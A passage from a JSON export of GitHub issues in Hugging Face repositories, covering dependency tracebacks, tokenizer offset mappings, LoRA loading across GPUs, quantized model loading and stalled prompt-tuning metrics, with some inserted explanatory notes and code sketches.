\"/Users/luasantilli/.cache/uv/archive-v0/tc_5IhQe7Zpw8ZXgQWpnl/lib/python3.13/site-packages/datasets/features/audio.py\", line 239, in cast_storage\n# storage = pa.array([Audio().encode_example(x) if x is not None else None for x in storage.to_pylist()])\n# ~~~~~~~~~~~~~~~~~~~~~~^^^\n# File \"/Users/luasantilli/.cache/uv/archive-v0/tc_5IhQe7Zpw8ZXgQWpnl/lib/python3.13/site-packages/datasets/features/audio.py\", line 122, in encode_example\n# sf.write(buffer, value[\"array\"].T, value[\"sampling_rate\"], format=\"wav\")\n# ^^^^^^^^^^^^^^^^\n# AttributeError: 'list' object has no attribute 'T'\n# ...\n#\n# For the case of datasets[audio] without explicit adding soundfile I get an FFmpeg\n# error.\n#\n# Last lines of error report:\n#\n# ...\n# RuntimeError: Could not load libtorchcodec. Likely causes:\n# 1. FFmpeg is not properly installed in your environment. We support\n# versions 4, 5, 6 and 7.\n# 2. The PyTorch version (2.7.1) is not compatible with\n# this version of TorchCodec. Refer to the version compatibility\n# table:\n# https://github.com/pytorch/torchcodec?tab=readme-ov-file#installing-torchcodec.\n# 3. 
Another runtime dependency; see exceptions below.\n# The following exceptions were raised as we tried to load libtorchcodec:\n#\n# [start of libtorchcodec loading traceback]\n# FFmpeg version 7: dlopen(/Users/luasantilli/.cache/uv/archive-v0/RK3IAlGfiICwDkHm2guLC/lib/python3.13/site-packages/torchcodec/libtorchcodec_decoder7.dylib, 0x0006): Library not loaded: @rpath/libavutil.59.dylib\n# Referenced from: <6DB21246-F28A-31A6-910A-D8F3355D1064> /Users/luasantilli/.cache/uv/archive-v0/RK3IAlGfiICwDkHm2guLC/lib/python3.13/site-packages/torchcodec/libtorchcodec_decoder7.dylib\n# Reason: no LC_RPATH's found\n# FFmpeg version 6: dlopen(/Users/luasantilli/.cache/uv/archive-v0/RK3IAlGfiICwDkHm2guLC/lib/python3.13/site-packages/torchcodec/libtorchcodec_decoder6.dylib, 0x0006): Library not loaded: @rpath/libavutil.58.dylib\n# Referenced from: /Users/luasantilli/.cache/uv/archive-v0/RK3IAlGfiICwDkHm2guLC/lib/python3.13/site-packages/torchcodec/libtorchcodec_decoder6.dylib\n# Reason: no LC_RPATH's found\n# FFmpeg version 5: dlopen(/Users/luasantilli/.cache/uv/archive-v0/RK3IAlGfiICwDkHm2guLC/lib/python3.13/site-packages/torchcodec/libtorchcodec_decoder5.dylib, 0x0006): Library not loaded: @rpath/libavutil.57.dylib\n# Referenced from: /Users/luasantilli/.cache/uv/archive-v0/RK3IAlGfiICwDkHm2guLC/lib/python3.13/site-packages/torchcodec/libtorchcodec_decoder5.dylib\n# Reason: no LC_RPATH's found\n# FFmpeg version 4: dlopen(/Users/luasantilli/.cache/uv/archive-v0/RK3IAlGfiICwDkHm2guLC/lib/python3.13/site-packages/torchcodec/libtorchcodec_decoder4.dylib, 0x0006): Library not loaded: @rpath/libavutil.56.dylib\n# Referenced from: <6E59F017-C703-3AF6-A271-6277DD5F8170> /Users/luasantilli/.cache/uv/archive-v0/RK3IAlGfiICwDkHm2guLC/lib/python3.13/site-packages/torchcodec/libtorchcodec_decoder4.dylib\n# Reason: no LC_RPATH's found\n# ...\n#\n# This is strange because the the same error does not happen when using version", "url": "https://github.com/huggingface/datasets/issues/7682", "state": "closed", "labels": [], "created_at": "2025-07-14T18:41:02Z", "updated_at": "2025-07-15T12:10:39Z", "comments": 2, "user": "luatil-cloud" }, { "repo": "huggingface/lerobot", "number": 1507, "title": "[PI0] Evaluation result on the metaworld", "body": "Has anyone tried training pi0 on the Metaworld benchmark? My evaluation results are relatively low 30~%.", "url": "https://github.com/huggingface/lerobot/issues/1507", "state": "closed", "labels": [ "bug", "question", "policies", "simulation" ], "created_at": "2025-07-14T14:56:38Z", "updated_at": "2025-10-08T08:47:31Z", "user": "chenkang455" }, { "repo": "huggingface/transformers", "number": 39401, "title": "Qwen3 tokenizer wrong offset_mapping", "body": "### System Info\n\ntransformers 4.53.2, Ubuntu 22.04.4, python 3.11.13\n\n### Who can help?\n\n@ArthurZucker and @itazap There must be a problem with the `offset_mapping` of Qwen3 `tokenizer`. The starting point in the text for each token, except the first and the last, is one position behind. 
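(Editorial note: this offset pattern is usually expected behavior rather than a bug. Qwen's tokenizer is a byte-level BPE in which the leading space belongs to the following token, so an offset like (1, 6) genuinely spans " girl"; BERT's WordPiece strips the whitespace instead, which is why its offsets start after the space. A quick way to see this, sketched below:)

```python
from transformers import AutoTokenizer

tok = AutoTokenizer.from_pretrained("Qwen/Qwen3-Embedding-0.6B")
enc = tok("A girl is styling her hair.", add_special_tokens=False,
          return_offsets_mapping=True)
for tid, (s, e) in zip(enc["input_ids"], enc["offset_mapping"]):
    # convert_ids_to_tokens shows the raw BPE token, e.g. 'Ġgirl',
    # whose offset span includes the leading space character.
    print(repr(tok.convert_ids_to_tokens(tid)), (s, e))
```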
I compared it with the BERT's `tokenizer`, which produces what is expected:\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```\nsample_text='A girl is styling her hair.'\nbert_tokenizer = BertTokenizerFast.from_pretrained('google-bert/bert-base-cased')\nbert_encoding = bert_tokenizer(\n text=sample_text, add_special_tokens=False, return_offsets_mapping=True\n)\nprint(bert_encoding['offset_mapping'])\nqwen_tokenizer = AutoTokenizer.from_pretrained('Qwen/Qwen3-Embedding-0.6B')\nqwen_encoding = qwen_tokenizer(\n text=sample_text, add_special_tokens=False, return_offsets_mapping=True\n)\nprint(qwen_encoding['offset_mapping'])\n```\n\n### Expected behavior\n\n[(0, 1), (2, 6), (7, 9), (10, 17), (18, 21), (22, 26), (26, 27)]\n[(0, 1), (1, 6), (6, 9), (9, 17), (17, 21), (21, 26), (26, 27)]", "url": "https://github.com/huggingface/transformers/issues/39401", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-14T14:21:08Z", "updated_at": "2025-07-16T09:59:35Z", "comments": 4, "user": "contribcode" }, { "repo": "huggingface/lerobot", "number": 1506, "title": "episode: None", "body": "When I run \"python -m lerobot.scripts.train --dataset.root=./lerobot_datasets/my_robot_dataset/ --output_dir=./lerobot_datasets/outputs/ --policy.type=pi0 --dataset.repo_id=lerobot/tape --policy.push_to_hub=false\", I got\n\u2018\u2019\n'dataset': {'episodes': None,\n 'image_transforms': {'enable': False...\n}\n\u2018\u2019. \nIs this right?", "url": "https://github.com/huggingface/lerobot/issues/1506", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-14T13:29:07Z", "updated_at": "2025-08-12T09:31:16Z", "user": "LogSSim" }, { "repo": "huggingface/finetrainers", "number": 420, "title": "How to fine-tune Wan 2.1 with Context Parallelism?", "body": "I am trying to fine-tune the Wan 2.1 model and would like to leverage the Context Parallelism (CP) feature to manage memory and scale the training. I saw in the main README that `CP support` is listed as a key feature.\n\nI have looked through the `examples/training` directory and the documentation, but I couldn't find a specific example or launch script demonstrating how to fine-tune the Wan model with Context Parallelism enabled.\n\nCould you please provide some guidance or a minimal example on how to properly configure a training job for **Wan 2.1 with Context Parallelism**?", "url": "https://github.com/huggingface/finetrainers/issues/420", "state": "open", "labels": [], "created_at": "2025-07-14T06:55:39Z", "updated_at": "2025-07-15T05:09:45Z", "user": "vviper25" }, { "repo": "huggingface/lerobot", "number": 1503, "title": "LeRobot So100 and Groot N1.5 Model Multi-Robot Deployment Feasibility Inquiry", "body": "Hello, I am conducting various tests using LeRobot's So100 (robot arm) with Groot N1.5 for training.\nI have some questions to ask.\n\n**Main Question**\nIs it possible to simultaneously apply a model trained with Groot N1.5 base on one robot to multiple robots of the same model?\n\n**Question Background (Actual Experience)**\nI had a model that was trained with Groot 1.5 base using data collected from So100. 
However, when one robot motor failed and was replaced, I had to recalibrate the entire system.\nAfter applying the previously used model for inference, the robot did not operate properly.\nI suspect this might be due to the basic position changing during the calibration process.\n\n**Core Question**\nFollowing this logic, does each robot of the same model require an individual model tailored to its specific calibration?\n\nThis question also relates to whether a single unified model can be used for inference and operation when deploying 100 robot arms in a factory setting.\n\nI would appreciate your response.", "url": "https://github.com/huggingface/lerobot/issues/1503", "state": "open", "labels": [ "enhancement", "question", "policies", "dataset" ], "created_at": "2025-07-14T05:55:44Z", "updated_at": "2025-08-12T09:31:35Z", "user": "devedgar" }, { "repo": "huggingface/lerobot", "number": 1497, "title": "ValueError: 'policy.repo_id' argument missing. Please specify it to push the model to the hub.", "body": "### System Info\n\n```Shell\nlerobot commit version:\nhttps://github.com/huggingface/lerobot/tree/69901b9b6a2300914ca3de0ea14b6fa6e0203bd4\n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n(lerobot) robot@robot-Legion-Y9000P-IRX8:~/imitation_learning_lerobot/lerobot$ python lerobot/scripts/train.py \\\n> --policy.type=act \\\n> --dataset.repo_id=lerobot/aloha_sim_transfer_cube_human \\\n> --env.type=aloha \\\n> --env.task=AlohaTransferCube-v0 \\\n> --output_dir=outputs/train/act_aloha_transfer\nINFO 2025-07-13 12:30:41 ils/utils.py:48 Cuda backend detected, using cuda.\nWARNING 2025-07-13 12:30:41 /policies.py:77 Device 'None' is not available. Switching to 'cuda'.\nTraceback (most recent call last):\n File \"/home/robot/imitation_learning_lerobot/lerobot/lerobot/scripts/train.py\", line 291, in \n train()\n File \"/home/robot/imitation_learning_lerobot/lerobot/lerobot/configs/parser.py\", line 226, in wrapper_inner\n response = fn(cfg, *args, **kwargs)\n File \"/home/robot/imitation_learning_lerobot/lerobot/lerobot/scripts/train.py\", line 110, in train\n cfg.validate()\n File \"/home/robot/imitation_learning_lerobot/lerobot/lerobot/configs/train.py\", line 120, in validate\n raise ValueError(\nValueError: 'policy.repo_id' argument missing. Please specify it to push the model to the hub.\n\n\n### Expected behavior\n\nexpected it can work", "url": "https://github.com/huggingface/lerobot/issues/1497", "state": "open", "labels": [ "question", "policies", "configuration" ], "created_at": "2025-07-13T04:33:14Z", "updated_at": "2025-08-12T09:32:36Z", "user": "dbdxnuliba" }, { "repo": "huggingface/trl", "number": 3730, "title": "How to design stable reward functions for open-ended text generation tasks in GRPO?", "body": "I'm using GRPO for a text generation task where there's no single correct answer. I currently compute the reward using cosine similarity between the model output and a reference response. 
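(For concreteness, one shape such a reward function can take with TRL's GRPOTrainer is sketched below. The embedding model and the "reference" column name are assumptions, and rescaling cosine similarity from [-1, 1] to [0, 1] is one common way to reduce reward variance; the sketch assumes completions arrive as plain strings rather than conversational message lists:)

```python
from sentence_transformers import SentenceTransformer, util

embedder = SentenceTransformer("all-MiniLM-L6-v2")  # assumed embedder

def cosine_reward(completions, reference, **kwargs):
    # GRPOTrainer passes extra dataset columns (here: "reference")
    # to reward functions as keyword arguments.
    emb_c = embedder.encode(completions, convert_to_tensor=True)
    emb_r = embedder.encode(reference, convert_to_tensor=True)
    sims = util.cos_sim(emb_c, emb_r).diagonal()  # pairwise similarity
    return ((sims + 1) / 2).tolist()  # rescale to [0, 1]
```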
However, during training (around 400 steps), the reward values are quite unstable and fluctuate significantly.\n\nI'm wondering:\n\nIs cosine similarity a reasonable choice for reward in open-ended tasks?\n\nAre there better practices to stabilize the reward or design it more effectively in such scenarios?\n\nShould I consider switching to a learnable reward model (e.g., contrastive learning)?\n\nAny general advice on reward design in non-deterministic generation tasks would be greatly appreciated. Thanks!", "url": "https://github.com/huggingface/trl/issues/3730", "state": "open", "labels": [ "\u2753 question", "\ud83c\udfcb Reward", "\ud83c\udfcb GRPO" ], "created_at": "2025-07-12T18:39:37Z", "updated_at": "2025-07-12T18:40:05Z", "user": "Jax922" }, { "repo": "huggingface/diffusers", "number": 11915, "title": "Create modular pipeline from existing pipeline", "body": "the new concept of modular pipelines added via #9672 is a very flexible way of creating custom pipelines \nand one of the best early use-cases is the new concept of modular guiders added via #11311 \n\nhowever, this would require a complete rewrite of the existing user apps/codebases to use new concepts \nand would likely significantly slow down adoption (if not even block adoption for a long time) \n\nthe ask here is to provide a way to use an existing pipeline to instantiate a modular pipeline, \nvery similar to how different standard diffusers pipelines can be instantiated \nfrom a single pipeline class using the `from_pipe` method \n\nexample of desired workflow:\n\n```py\nimport torch\nimport diffusers\n\n# load pipeline using any normal method \n# such as DiffusionPipeline, AutoPipelineForText2Image, StableDiffusionPipeline, etc. \npipe = diffusers.DiffusionPipeline.from_pretrained(\n \"stabilityai/stable-diffusion-xl-base-1.0\",\n torch_dtype=torch.bfloat16,\n)\n\n# create modular pipeline from loaded pipeline\nmodular = diffusers.ModularPipeline.from_pipe(pipe)\n\n# create guider and activate it\ncfg = diffusers.ClassifierFreeGuidance(guidance_scale=5.0, guidance_rescale=0.0, start=0.0, stop=1.0)\nmodular.update_states(guider=cfg)\n\noutput = modular(\n prompt='astronaut in a diner',\n height=1024, width=1024)\n```\n\ncc: @yiyixuxu @a-r-r-o-w @sayakpaul ", "url": "https://github.com/huggingface/diffusers/issues/11915", "state": "closed", "labels": [], "created_at": "2025-07-12T16:08:30Z", "updated_at": "2025-08-28T08:18:08Z", "comments": 6, "user": "vladmandic" }, { "repo": "huggingface/diffusers", "number": 11914, "title": "Loading multiple LoRAs to 1 pipeline in parallel, 1 LoRA to 2-pipelines on 2-GPUs", "body": "Hi everyone,\n\nI have the following scenario. \n\nI have a machine with 2 GPUs and a running service that keeps two pipelines loaded to their corresponding devices. Also I have a list of LoRAs (say 10). On each request I split the batch into 2 parts (the request also has the corresponding information about the LoRA), load LoRAs and run the forward pass.\n\nThe problem I encounter is that with every parallelization method I have tried (threading, multi-processing), the most I have achieved is pre-loading LoRAs on the CPU, then moving them to GPU, and only after that calling `load_lora_weights` from the state_dict. \n\nWhen I attempt to achieve parallelization by running that loading chunk in parallel threads, the pipe starts to produce either complete noise or a black image.\n\nWhere I would appreciate help a lot is:\n\n1. 
To get an advice of elegantly loading multiple LoRAs at once into one pipe (all examples in the documentation indicate that one needs to do it 1 by 1)\n2. If I have 2 pipes on 2 different devices, how to parallelize the process of loading 1 LoRA to pipes on their corresponding devices.\n\n```\ndef apply_multiple_loras_from_cache(pipes, adapter_names, lora_cache, lora_names, lora_strengths, devices):\n for device_index, pipe in enumerate(pipes):\n logger.info(f\"Starting setup for device {devices[device_index]}\")\n \n # Step 1: Unload LoRAs\n start = time.time()\n pipe.unload_lora_weights(reset_to_overwritten_params=False)\n logger.info(f\"[Device {device_index}] Unload time: {time.time() - start:.3f}s\")\n\n # Step 2: Parallelize CPU \u2192 GPU state_dict move\n def move_to_device(name):\n return name, {\n k: v.to(devices[device_index], non_blocking=True).to(pipe.dtype)\n for k, v in lora_cache[name]['state_dict'].items()\n }\n\n start = time.time()\n with ThreadPoolExecutor() as executor:\n future_to_name = {executor.submit(move_to_device, name): name for name in adapter_names}\n results = [future.result() for future in as_completed(future_to_name)]\n logger.info(f\"[Device {device_index}] State dict move + dtype conversion time: {time.time() - start:.3f}s\")\n\n # Step 3: Load adapters\n start = time.time()\n \n \n for adapter_name, state_dict in results:\n\n pipe.load_lora_weights(\n pretrained_model_name_or_path_or_dict=state_dict,\n adapter_name=adapter_name\n )\n logger.info(f\"[Device {device_index}] Load adapter weights time: {time.time() - start:.3f}s\")\n\n # Step 4: Set adapter weights\n start = time.time()\n pipe.set_adapters(lora_names, adapter_weights=lora_strengths)\n logger.info(f\"[Device {device_index}] Set adapter weights time: {time.time() - start:.3f}s\")\n\n torch.cuda.empty_cache()\n logger.info(\"All LoRAs applied and GPU cache cleared.\")\n```", "url": "https://github.com/huggingface/diffusers/issues/11914", "state": "closed", "labels": [], "created_at": "2025-07-12T15:54:44Z", "updated_at": "2025-07-15T19:40:11Z", "comments": 5, "user": "vahe-toffee" }, { "repo": "huggingface/lerobot", "number": 1494, "title": "release the code for reproducing the performance on the LIBERO dataset reported in the SmolVLA paper?", "body": "Has anyone been able to reproduce the performance on the LIBERO dataset reported in the SmolVLA paper? I\u2019d appreciate any guidelines or tips to help with reproducing the results.", "url": "https://github.com/huggingface/lerobot/issues/1494", "state": "closed", "labels": [ "question", "policies", "simulation" ], "created_at": "2025-07-12T09:35:00Z", "updated_at": "2025-09-23T09:44:59Z", "user": "JustinKai0527" }, { "repo": "huggingface/datasets", "number": 7680, "title": "Question about iterable dataset and streaming", "body": "In the doc, I found the following example: https://github.com/huggingface/datasets/blob/611f5a592359ebac6f858f515c776aa7d99838b2/docs/source/stream.mdx?plain=1#L65-L78\n\nI am confused, \n1. If we have already loaded the dataset, why doing `to_iterable_dataset`? Does it go through the dataset faster than map-style dataset?\n2. `load_dataset(streaming=True)` is useful for huge dataset, but the speed is slow. 
How to make it comparable to `to_iterable_dataset` without loading the whole dataset into RAM?", "url": "https://github.com/huggingface/datasets/issues/7680", "state": "open", "labels": [], "created_at": "2025-07-12T04:48:30Z", "updated_at": "2025-08-01T13:01:48Z", "comments": 8, "user": "Tavish9" }, { "repo": "huggingface/transformers", "number": 39377, "title": "FlashAttention2 support for GSAI-ML / LLaDA-8B-Instruct?", "body": "Hi there,\n\nI attempted to use flash attention 2 with this model but it seems like it isn't supported, based on this error:\n```\nValueError: LLaDAModelLM does not support Flash Attention 2.0 yet. Please request to add support where the model is hosted, on its model hub page: https://huggingface.co/GSAI-ML/LLaDA-8B-Instruct/discussions/new or in the Transformers GitHub repo: https://github.com/huggingface/transformers/issues/new\n```\n\nWould it be possible to add support for this kind of model?\n\nThank you for your time!", "url": "https://github.com/huggingface/transformers/issues/39377", "state": "closed", "labels": [], "created_at": "2025-07-12T02:48:36Z", "updated_at": "2025-08-19T08:03:26Z", "comments": 2, "user": "lbertge" }, { "repo": "huggingface/lerobot", "number": 1492, "title": "Is there any plan to add a validation loss in the training pipeline, which is not dependent on simulation env.", "body": "Can we have a dataset split in the training code to run the model on a holdout validation episode to check loss on it?", "url": "https://github.com/huggingface/lerobot/issues/1492", "state": "open", "labels": [ "enhancement", "question", "policies" ], "created_at": "2025-07-11T20:43:04Z", "updated_at": "2025-12-30T07:12:20Z", "user": "mohitydv09" }, { "repo": "huggingface/peft", "number": 2642, "title": "Prompt_Tuning.ipynb example doesn't seem to train the model", "body": "Hello! I am running the Prompt-Tuning notebook example from the PEFT lib examples [here](https://github.com/huggingface/peft/blob/main/examples/sequence_classification/Prompt_Tuning.ipynb). I did **not** change any line of code, and I ran the code blocks sequentially.\n\nHowever, the performance under metrics remains exactly the **same** for each epoch, which is very weird. From the [original notebook](https://github.com/huggingface/peft/blob/main/examples/sequence_classification/Prompt_Tuning.ipynb), we can see accuracy fluctuates and can increase to 0.70. \n\nI checked that the output logits for the training data are changing every epoch (set shuffle=False, and this is the only change for debugging). 
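(A quick diagnostic worth running here, sketched under the assumption that `model` is the PeftModel from the notebook: if the logits move but the metrics stay frozen at exactly 0.6838/0.8122, the model may simply be predicting the majority class throughout, so checking that the prompt embeddings receive non-zero gradients after a backward pass separates "not training at all" from "training, but not enough to flip any predictions":)

```python
# Run right after one loss.backward() inside the training loop.
for name, p in model.named_parameters():
    if p.requires_grad:
        g = "no grad" if p.grad is None else f"grad norm {p.grad.norm():.4e}"
        print(name, tuple(p.shape), g)
```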
Now I am very confused, any suggestions would be very much welcome, please let me know if I am doing something very wrong, thanks in advance!\n\n\nHere's the performance log:\n```\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.74it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.36it/s]\nepoch 0: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.72it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.49it/s]\nepoch 1: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.74it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.34it/s]\nepoch 2: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.72it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.35it/s]\nepoch 3: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.74it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.47it/s]\nepoch 4: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.69it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.63it/s]\nepoch 5: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.75it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.45it/s]\nepoch 6: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.74it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.40it/s]\nepoch 7: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.74it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.53it/s]\nepoch 8: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:19<00:00, 5.76it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.27it/s]\nepoch 9: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.75it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.50it/s]\nepoch 10: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.74it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.63it/s]\nepoch 11: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:19<00:00, 
5.77it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.50it/s]\nepoch 12: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:19<00:00, 5.78it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.60it/s]\nepoch 13: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.74it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.54it/s]\nepoch 14: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n```\n\nBesides, my environment info is here if it helps debugging:\n```\npython 3.10\ntransformers 4.52.4\npeft 0.16.0\ntorch 2.7.0\njupyterlab 4.4.3\nOS Ubuntu 22.04 LTS\nGPU NVIDIA RTX 5880\n```", "url": "https://github.com/huggingface/peft/issues/2642", "state": "closed", "labels": [], "created_at": "2025-07-11T18:26:58Z", "updated_at": "2025-08-23T15:03:47Z", "comments": 8, "user": "ruixing76" }, { "repo": "huggingface/transformers", "number": 39366, "title": "RuntimeError when loading llmcompressor W8A8 quantized model: int8 dtype in weight initialization", "body": "I'm trying to load the quantized model `RedHatAI/Qwen2.5-VL-7B-Instruct-quantized.w8a8` but encountering a dtype compatibility issue during model initialization. The model appears to be quantized using `llmcompressor` with W8A8 quantization scheme.\n\n**Note**: I need to load this model without vLLM because I may need to add custom hooks for my research, so I'm looking for a direct loading method using transformers/llmcompressor.\n\n## Error Message\n\n```python\nRuntimeError: expected a floating-point or complex dtype, but got dtype=torch.int8\n```\n\n**Full Stack Trace:**\n```python\nFile \"/transformers/models/qwen2_5_vl/modeling_qwen2_5_vl.py\", line 366, in _init_weights\n module.weight.data.normal_(mean=0.0, std=std)\nFile \"/torch/_refs/__init__.py\", line 6214, in normal_\n return normal(mean, std, self.shape, out=self, generator=generator)\n...\nRuntimeError: expected a floating-point or complex dtype, but got dtype=torch.int8\n```\n\n## Traceback\n\nThe error occurs during model weight initialization where transformers tries to call `normal_()` on int8 tensors. The `normal_()` function in PyTorch only works with floating-point tensors, but the quantized model contains int8 weights.\n\n**Specific failure point:**\n- File: `modeling_qwen2_5_vl.py`, line 366\n- Function: `_init_weights()` \n- Operation: `module.weight.data.normal_(mean=0.0, std=std)`\n- Issue: Trying to apply normal distribution to int8 tensors\n\n## Model Information\n\nBased on the model's `config.json`:\n- **Quantization method**: `compressed-tensors`\n- **Format**: `int-quantized` \n- **Scheme**: W8A8 (8-bit weights and activations)\n- **Base model**: `Qwen/Qwen2.5-VL-7B-Instruct`\n- **Compression ratio**: ~1.2x\n- **Ignored layers**: All visual layers (`visual.blocks.*`, `visual.merger.*`, `lm_head`)\n\n## What I've Tried\n\n### 1. 
llmcompressor methods:\n```python\n# Method 1: TraceableQwen2_5_VLForConditionalGeneration\nfrom llmcompressor.transformers.tracing import TraceableQwen2_5_VLForConditionalGeneration\nmodel = TraceableQwen2_5_VLForConditionalGeneration.from_pretrained(\n model_path, device_map=\"auto\", torch_dtype=\"auto\", trust_remote_code=True\n)\n\n# Method 2: SparseAutoModelForCausalLM \nfrom llmcompressor.transformers import SparseAutoModelForCausalLM\nmodel = SparseAutoModelForCausalLM.from_pretrained(\n model_path, device_map=\"auto\", torch_dtype=\"auto\", trust_remote_code=True\n)\n```\n\n### 2. Standard transformers methods:\n```python\n# Method 3: Various dtype configurations\nmodel = Qwen2_5_VLForConditionalGeneration.from_pretrained(\n model_path,\n torch_dtype=torch.bfloat16, # Also tried: torch.float16, \"auto\", None\n trust_remote_code=True,\n device_map=\"auto\"\n)\n\n# Method 4: AutoModelForCausalLM\nmodel = AutoModelForCausalLM.from_pretrained(\n model_path, trust_remote_code=True, torch_dtype=\"auto\"\n)\n```\n\n**All methods fail at the same weight initialization step, so I wonder should the model be loaded with `_fast_init=False` or other special parameters?**\n\n## Additional Observations\n\n1. **Warning about ignored layers**: The loader warns about missing visual layers, but this seems expected since they were ignored during quantization\n2. **Model files exist**: The quantized model directory contains the expected `.safetensors` files and configuration\n3. **Original model works**: The base `Qwen/Qwen2.5-VL-7B-Instruct` loads and works perfectly\n\n## Environment\n\n- **Python**: 3.10\n- **PyTorch**: 2.7.0+cu126\n- **Transformers**: 4.52.4\n- **LLMCompressor**: 0.6.0\n- **Compressed-tensors**: 0.10.2\n\n\nThis model was likely created using llmcompressor's oneshot quantization:\n```python\nfrom llmcompressor.modifiers.quantization import GPTQModifier\nfrom llmcompressor.transformers import oneshot\n\nrecipe = [\n GPTQModifier(\n targets=\"Linear\",\n scheme=\"W8A8\", \n sequential_targets=[\"Qwen2_5_VLDecoderLayer\"],\n ignore=[\"lm_head\", \"re:visual.*\"],\n ),\n]\n```\nIf this is more of an llmcompressor-specific model loading issue rather than a transformers compatibility issue, please let me know and I'll file this issue in the llmcompressor repository instead.\n\n", "url": "https://github.com/huggingface/transformers/issues/39366", "state": "closed", "labels": [ "Good First Issue" ], "created_at": "2025-07-11T15:15:09Z", "updated_at": "2025-12-08T13:30:10Z", "comments": 10, "user": "AdelineXinyi" }, { "repo": "huggingface/lerobot", "number": 1483, "title": "How can I set `max_relative_target` to get safe action?", "body": "I saw this in function `send_action` in `src/lerobot/robots/so100_follower/so100_follower.py` \n```python\n\n def send_action(self, action: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Command arm to move to a target joint configuration.\n\n The relative action magnitude may be clipped depending on the configuration parameter\n `max_relative_target`. 
